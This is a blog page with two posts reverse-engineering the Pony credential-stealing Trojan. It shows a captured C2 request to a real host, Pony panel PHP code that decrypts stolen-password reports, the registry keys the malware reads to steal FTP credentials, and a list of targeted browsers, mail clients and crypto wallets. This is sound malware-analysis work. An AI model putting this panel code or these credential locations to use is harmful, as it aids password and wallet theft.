<span style="font-family: Courier New;">Host: titratresfi.ru<br />
</span><br />
<span style="font-family: Courier New;">Accept: */*<br />
</span><br />
<span style="font-family: Courier New;">Accept-Encoding: identity, *;q=0<br />
</span><br />
<span style="font-family: Courier New;">Accept-Language: en-US<br />
</span><br />
<span style="font-family: Courier New;">Content-Length: 274<br />
</span><br />
<span style="font-family: Courier New;">Content-Type: application/octet-stream<br />
</span><br />
<span style="font-family: Courier New;">Connection: close<br />
</span><br />
<span style="font-family: Courier New;">Content-Encoding: binary<br />
</span><br />
<span style="font-family: Courier New;">User-Agent: Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR
3.0.04506.648; .NET CLR 3.5.21022)<br />
</span><br />
<span style="font-family: Courier New;">…..ql.H.l.W.*.F.udS]<…L….^.cF.;!….A5 v…<6…….D….Z.+.xld.{o.JFY`.D..Z….aP.}U…W..6..<NR.7@P.1..p5t.`……U<br />
</span><br />
<span style="font-family: Courier New;">>..d.!..3..tHJ.J..I……g8…8.`..`.f…i..J..(r..MrnW…f.r.v[…….t.}…D`%}U…m…K.E.n..R&+.iD.:4…9.L.\…EnR…?.<…|.B…$o..<br />
</span><br />
<span style="font-family: Courier New;">…/….AHTTP/1.1 200 OK<br />
</span><br />
<span style="font-family: Courier New;">Server: nginx/1.6.2<br />
</span><br />
<span style="font-family: Courier New;">Date: Thu, 12 Nov 2015 15:35:16 GMT<br />
</span><br />
<span style="font-family: Courier New;">Content-Type: text/html<br />
</span><br />
<span style="font-family: Courier New;">Connection: close<br />
</span><br />
<span style="font-family: Courier New;">X-Powered-By: PHP/5.4.41<br />
</span><br />
<span style="font-family: Courier New;">.Z..O….&P..na..+..<br />
</span><br />
This is a basic initialization request sent to the server and,
apparently, it is encrypted. Let’s look at the Pony panel source code to
figure out what type of encryption it is using and how is can be
decoded back<br />
Looking at the source code of gat efor handing basic basic request we find out<br />
It first checks if the size of greater than 12 and max_db_len_size .
After that data is verified again a header in function
verify_report_file_header() which tells us that it has a header as well .<br />
Let’s dig in to the source code of password_modules.php to find out.<br />
We are able to locate the following functions responsible for verifying the packet header<br />
<span style="font-family: Courier New; font-size: 8pt;">public static function verify_new_file_header(&$data)</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> {</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> if (strlen($data) < 4)</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> return false;</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> $max_header_len = max(strlen(REPORT_HEADER), strlen(REPORT_PACKED_HEADER), strlen(REPORT_CRYPTED_HEADER));</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> $rc4_key = substr($data, 0, 4);</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> $encrypted_header = substr($data, 4, $max_header_len);</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> $decrypted_header = rc4Decrypt($rc4_key, $encrypted_header);</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> return self::verify_old_file_header($decrypted_header);</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> }</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> public static function verify_old_file_header(&$data)</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> {</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> if ((substr($data, 0, strlen(REPORT_HEADER))) == REPORT_HEADER)</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> return true;</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> if ((substr($data, 0, strlen(REPORT_PACKED_HEADER))) == REPORT_PACKED_HEADER)</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> return true;</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> if ((substr($data, 0, strlen(REPORT_CRYPTED_HEADER))) == REPORT_CRYPTED_HEADER)</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> return true;</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> return false;</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> }</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> public static function verify_report_file_header(&$data)</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> {</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> return self::verify_new_file_header($data) || self::verify_old_file_header($data);</span><br />
<span style="font-family: Courier New; font-size: 8pt;"> }</span><br />
It consists of two predefined headers new and old one and both of them are check consecutively.<br />
Following are the defines for header magic keywords<br />
<span style="font-family: Courier New;">define(“REPORT_HEADER”,”PWDFILE0″); // each password report starts with this header<br />
</span><br />
<span style="font-family: Courier New;">define(“REPORT_PACKED_HEADER”, “PKDFILE0”); // header indicating that report is packed<br />
</span><br />
<span style="font-family: Courier New;">define(“REPORT_CRYPTED_HEADER”, “CRYPTED0”); // header indicating that report is encrypted<br />
</span><br />
The maximum size of the header is 12 bytes, so twelve bytes after
first 4 bytes always contains the header. First four bytes are used as
rc4 key.<br />
<span style="font-family: Courier New;"> $rc4_key = substr($data, 0, 4);<br />
</span><br />
<span style="font-family: Courier New;"> $encrypted_header = substr($data, 4, $max_header_len);<br />
</span><br />
<span style="font-family: Courier New;"> $decrypted_header = rc4Decrypt($rc4_key, $encrypted_header);<br />
</span><br />
After decryption, another function is called to decrypt the rest of
the report and check the integrity of the report. i.e.
pre_decrypt_report()<br />
<span style="font-family: Courier New;"> public static function pre_decrypt_report(&$data, $report_password = ”)<br />
</span><br />
<span style="font-family: Courier New;"> {<br />
</span><br />
<span style="font-family: Courier New;"> if (self::verify_new_file_header($data))<br />
</span><br />
<span style="font-family: Courier New;"> {<br />
</span><br />
<span style="font-family: Courier New;"> self::rand_decrypt($data);<br />
</span><br />
<span style="font-family: Courier New;"> }<br />
</span><br />
<span style="font-family: Courier New;"> if ((substr($data, 0, strlen(REPORT_CRYPTED_HEADER))) != REPORT_CRYPTED_HEADER)<br />
</span><br />
<span style="font-family: Courier New;"> return false;<br />
</span><br />
<span style="font-family: Courier New;"> if (strlen($data) == 0)<br />
</span><br />
<span style="font-family: Courier New;"> {<br />
</span><br />
<span style="font-family: Courier New;"> return false;<br />
</span><br />
<span style="font-family: Courier New;"> } else if (strlen($data) < 12) // length cannot be less than 12 bytes (8-byte header + crc32 checksum)<br />
</span><br />
<span style="font-family: Courier New;"> {<br />
</span><br />
<span style="font-family: Courier New;"> return false;<br />
</span><br />
<span style="font-family: Courier New;"> } else if (strlen($data) > REPORT_LEN_LIMIT)<br />
</span><br />
<span style="font-family: Courier New;"> {<br />
</span><br />
<span style="font-family: Courier New;"> return false;<br />
</span><br />
<span style="font-family: Courier New;"> } elseif (strlen($data) == 12) // empty report<br />
</span><br />
<span style="font-family: Courier New;"> return false;<br />
</span><br />
<span style="font-family: Courier New;"> // extract crc32 checksum from datastream<br />
</span><br />
<span style="font-family: Courier New;"> $crc_chk = data_int32(substr($data, strlen($data)-4));<br />
</span><br />
<span style="font-family: Courier New;"> // remove crc32 checksum from the encrypted data stream<br />
</span><br />
<span style="font-family: Courier New;"> $encrypted_data = substr($data, 0, -4);<br />
</span><br />
<span style="font-family: Courier New;"> // check report validness<br />
</span><br />
<span style="font-family: Courier New;"> $crc_chk = obf_crc32($crc_chk);<br />
</span><br />
<span style="font-family: Courier New;"> if ((int)crc32($encrypted_data) != (int)$crc_chk)<br />
</span><br />
<span style="font-family: Courier New;"> {<br />
</span><br />
<span style="font-family: Courier New;"> return false;<br />
</span><br />
<span style="font-family: Courier New;"> }<br />
</span><br />
<span style="font-family: Courier New;"> $decrypted_data = rc4Decrypt($report_password, substr($encrypted_data, 8));<br />
</span><br />
<span style="font-family: Courier New;"> // there’s another crc32 checksum available to verify the decryption process<br />
</span><br />
<span style="font-family: Courier New;"> // extract crc32 checksum from decrypted datastream<br />
</span><br />
<span style="font-family: Courier New;"> $crc_chk = data_int32(substr($decrypted_data, strlen($decrypted_data)-4));<br />
</span><br />
<span style="font-family: Courier New;"> // remove crc32 checksum from the data stream<br />
</span><br />
<span style="font-family: Courier New;"> $decrypted_data_check = substr($decrypted_data, 0, -4);<br />
</span><br />
<span style="font-family: Courier New;"> // check report validness<br />
</span><br />
<span style="font-family: Courier New;"> $crc_chk = obf_crc32($crc_chk);<br />
</span><br />
<span style="font-family: Courier New;"> if ((int)crc32($decrypted_data_check) != (int)$crc_chk)<br />
</span><br />
<span style="font-family: Courier New;"> {<br />
</span><br />
<span style="font-family: Courier New;"> return false;<br />
</span><br />
<span style="font-family: Courier New;"> }<br />
</span><br />
<span style="font-family: Courier New;"> $data = $decrypted_data;<br />
</span><br />
<span style="font-family: Courier New;"> return true;<br />
</span><br />
<span style="font-family: Courier New;"> }<br />
</span><br />
<span style="font-family: Courier New;">}<br />
</span><br />
In this function, the header is verified again and 4 bytes value is
extracted from the end of data stream. This value is used as a CRC32
check sum for the data crc32 check sum is removed and then integrity is
calculated.<br />
<br />
After successfully verifying the crc32 hash. This data chunk after
first 8 bytes is decoded with a predefined rc4 key taken form the
database $report_password<br />
<span style="font-family: Courier New;">$pony_db_report_password = $pony_db->get_option(‘report_password’, ”, REPORT_DEFAULT_PASSWORD);<br />
</span><br />
Again crc32 check sum is extracted form the last 4 bytes of decrypted stream and is checked for integrity.<br />
If it a type packed file then it is uncompressed with aplib . If it
is a basic request, it is rc4 decrypted and parsed in a structure<br />
<span style="font-family: Courier New;"> // process report<br />
</span><br />
<span style="font-family: Courier New;"> ob_start(); // detect report processing noise<br />
</span><br />
<span style="font-family: Courier New;"> error_reporting(E_ALL);<br />
</span><br />
<span style="font-family: Courier New;"> $parse_result = $report->process_report($received_report_data, $pony_db_report_password);<br />
</span><br />
<span style="font-family: Courier New;"> $ob_data = trim(ob_get_contents());<br />
</span><br />
<span style="font-family: Courier New;"> error_reporting(0);<br />
</span><br />
<span style="font-family: Courier New;"> ob_end_clean();<br />
</span><br />
Before it checks if the report ID is already present in the system
and if so it does not proceed with creating a new ID for the particular
report.<br />
It then proceeds filling up information from unencrypted data into the database, which is of the following format.<br />
<span style="font-family: Courier New;">$pony_db->update_parsed_report($report_id,
$report->report_os_name, $report->report_is_win64,
$report->report_is_admin, $report->report_hwid,
$report->report_version_id, $url_list_array,
$report->log->log_lines, $report->cert_lines,
$report->wallet_lines, $email_lines);<br />
</span><br />
Let’s now have a look how Pony tries to steal passwords. All the
routines responsible for stealing stored credentials are stored in a
pointer array:<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2313_Reversingth1.png" /><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2313_Reversingth2.png" /><br />
let’s look at a function responsible for stealing FFFTP passwords.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2313_Reversingth3.png" /><br />
It first looks for encoded stored password in Software\\Sota\\FFFTP
registry key and after all the keys are found it will try to decode them
using its own decoding algorithm<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2313_Reversingth4.png" /></div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-38672772288133385362015-12-31T14:46:00.000+05:302015-12-31T14:46:17.557+05:30Pony Trojan reversing (part-I)<div dir="ltr" style="text-align: left;" trbidi="on">
Pony is a stealer Trojan and has been active for quite a while now. It was responsible for stealing over $200,000 in bitcoins ( <a href="https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/">https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/</a>) . In this post we will try to cover the reversing of pony Trojan.<br />
Tools required<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://cdn.shopify.com/s/files/1/0402/2761/products/my_gigantic_trojan_pony_ea6fb3e2-1be9-451b-8ce9-3e1fe60862eb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://cdn.shopify.com/s/files/1/0402/2761/products/my_gigantic_trojan_pony_ea6fb3e2-1be9-451b-8ce9-3e1fe60862eb.jpg" height="320" width="256" /></a></div>
<br />
<ol>
<li>VMware</li>
<li>IDA Disassembler</li>
<li>OllyDbg Debugger</li>
<li>Hex editor</li>
</ol>
First, we will examine its dynamic analysis behavior.<br />
<div>
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 120px;"></col>
<col style="width: 644px;"></col></colgroup>
<tbody valign="top">
<tr>
<td style="border: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE NAME</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">tt2.exe</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE SIZE</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">209408 bytes</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE TYPE</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MD5</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">6245899b11a6bd6769b3656943322d13</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA1</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">9879565d8c82e356cb7da62b9f04c3707cd3aac8</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA256</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA512</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">1a0dd9df25e3bd03e80b1563fa13f71f536e353d06cc07ba52f6c40255ace7d13f909e319337e34ce0164a5c1c6c435569b4e3cdba1f02d82425ec42f58cf080</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CRC32</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">906EA658</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SSDEEP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">3072:zGYRxKHi2O9dXvuq+OqUkPdlvWjrcJUVRC169xF5VeOF8x0sk:zRTKHid6OWPdacJUVU6FeOe0D</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">YARA</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">None matched</span></td>
</tr>
</tbody>
</table>
</div>
Running it though Cuckoo we get the following basic details about it:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth1.png" /></div>
We now have an initial idea what the malware is doing. It can be summarized as:<br />
<ol>
<li>Connects to traffic.</li>
<li>Has an anti-sandbox feature (based on time difference)</li>
<li>Hooks and Reads browser data.</li>
<li>Hides itself in ADS.</li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth2.png" /></div>
Look at some of its some of its registry modification or retrievals.<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar<br />
HKEY_CURRENT_USER\Software\FlashFXP\3<br />
HKEY_CURRENT_USER\Software\FlashFXP<br />
HKEY_CURRENT_USER\Software\FlashFXP\4<br />
HKEY_LOCAL_MACHINE\Software\FlashFXP\3<br />
HKEY_LOCAL_MACHINE\Software\FlashFXP<br />
HKEY_LOCAL_MACHINE\Software\FlashFXP\4<br />
HKEY_CURRENT_USER\Software\FileZilla<br />
HKEY_CURRENT_USER\Software\FileZilla Client<br />
HKEY_LOCAL_MACHINE\Software\FileZilla<br />
HKEY_LOCAL_MACHINE\Software\FileZilla Client<br />
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main<br />
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main<br />
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options<br />
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options<br />
HKEY_CURRENT_USER\Software\BPFTP<br />
HKEY_CURRENT_USER\Software\TurboFTP<br />
HKEY_LOCAL_MACHINE\Software\TurboFTP<br />
HKEY_CURRENT_USER\Software\Sota\FFFTP<br />
HKEY_CURRENT_USER\Software\Sota\FFFTP\Options<br />
HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Profiles<br />
HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites<br />
HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224<br />
HKEY_CURRENT_USER\Software\FTP Explorer\Profiles<br />
HKEY_CURRENT_USER\Software\VanDyke\SecureFX<br />
HKEY_CURRENT_USER\Software\Cryer\WebSitePublisher<br />
HKEY_CURRENT_USER\Software\ExpanDrive\Sessions<br />
HKEY_CURRENT_USER\Software\ExpanDrive<br />
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts<br />
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts<br />
HKEY_CURRENT_USER\SOFTWARE\NCH Software\Fling\Accounts<br />
HKEY_LOCAL_MACHINE\SOFTWARE\NCH Software\Fling\Accounts<br />
HKEY_CURRENT_USER\Software\FTPClient\Sites<br />
HKEY_LOCAL_MACHINE\Software\FTPClient\Sites<br />
HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites<br />
HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites<br />
HKEY_CURRENT_USER\SOFTWARE\LeapWare<br />
HKEY_LOCAL_MACHINE\SOFTWARE\LeapWare<br />
HKEY_CURRENT_USER\Software\Martin Prikryl<br />
HKEY_LOCAL_MACHINE\Software\Martin Prikryl<br />
HKEY_CURRENT_USER\Software\South River Technologies\WebDrive\Connections<br />
HKEY_LOCAL_MACHINE\Software\South River Technologies\WebDrive\Connections<br />
As you can see, it is evident that it is trying to look for stored
password related information. Apart from stored credentials, it also
steals bitcoin. Following is the list software it tries to steal from:<br />
<div style="text-align: center;">
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 165px;"></col>
<col style="width: 172px;"></col>
<col style="width: 113px;"></col></colgroup>
<tbody valign="top">
<tr>
<td style="border: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">AR Manager</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTPGetter</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Pocomail</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Total Commander</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ALFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">IncrediMail</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WS_FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Internet Explorer</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">The Bat!</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CuteFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Dreamweaver</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Outlook</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FlashFXP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">DeluxeFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Thunderbird</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FileZilla</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Google Chrome</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FastTrackFTP</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Commander</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Chromium / SRWare Iron</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bitcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">BulletProof FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ChromePlus</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Electrum</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SmartFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bromium (Yandex Chrome)</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MultiBit</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">TurboFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Nichrome</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Disk</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FFFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Comodo Dragon</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Litecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CoffeeCup FTP / Sitemapper</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">RockMelt</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Namecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CoreFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">K-Meleon</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Terracoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Explorer</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Epic</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bitcoin Armory</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Frigate3 FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Staff-FTP</span></td>
